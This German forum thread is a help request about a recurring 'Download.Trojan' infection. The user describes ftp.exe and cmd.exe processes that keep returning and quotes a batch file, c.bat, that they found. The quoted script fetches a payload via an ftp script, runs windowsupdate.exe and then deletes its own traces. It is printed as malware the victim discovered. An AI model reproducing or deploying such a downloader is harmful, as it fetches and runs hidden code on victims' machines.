Ärger mit Trojaner ..

Gabber19

Semiprofi
Hidiho

Ich hab hier auf dem PC nen Trojaner.. Download.Trojan heisst er.
Zumindest findet mein Norton AV das immer, er kann ihn dann auch löschen.
Aber die Meldung taucht immer und immer wieder auf, geile Sache!

Bekannt ist der seit Juni '01 ! :mad:

Hab gemacht was auf der Symantec HP steht :
Sys-Wiederherstellung abeschaltet
Live Update
Abgesichterter Modus
Scan ...
NIX, NADA nur ein paar AdWares, die aber schon "tot" waren :wall:

Paar andere Sachen noch :
hab immer ne "ftp.exe" und/oder n "cmd.exe" (nein hab keine Console offen) im Taskmanager .. natürlich von System :bigok:
Kann ich prima abschiessen :shot: , aber die kommen auch gerne von selbst wieder :kotz:

Was soll ich machen?
Registry hab ich auch geschaut, da steht nix unter Run / RunOnce etc... weder bei LOCAL_MACHINE noch bei CURRENT_USER

Ich weiss nix mehr, kann doch ned so krass sein ein 4 Jahre alten Trojaner zu killen :eek:

€:
hab da so ne c.bat gefunden :

Code:
@echo off
ftp -n -v -s:.pif 
windowsupdate.exe 
del .pif 
del /F c.bat 
exit /y
Is mal alles was da drinn war verschoben worden :motz:

€2:
Die Bat-Datei kommt immer wieder, genauso wie die "windowsupdate" "ftpupd"
Ich krieg die Krise! :-[

Zuletzt bearbeitet:
Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
Hat sich erledigt, hab mal ein paar WInUpdates gemacht & die andern Rechner im Netz gescannt.. jetzt herrscht wieder Ruhe ^^
Trotzdem THX !

lass die finger von norton denn alles was mit norton anfängt ist mist, die waren mal gut und ruhen sich da drauf aus.
die anderen hersteller haben die alle überholt.
sie dir mal NOD32 an ist klein flink und sauber.

mfg
werner

Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.

Zurück
Oben Unten refresh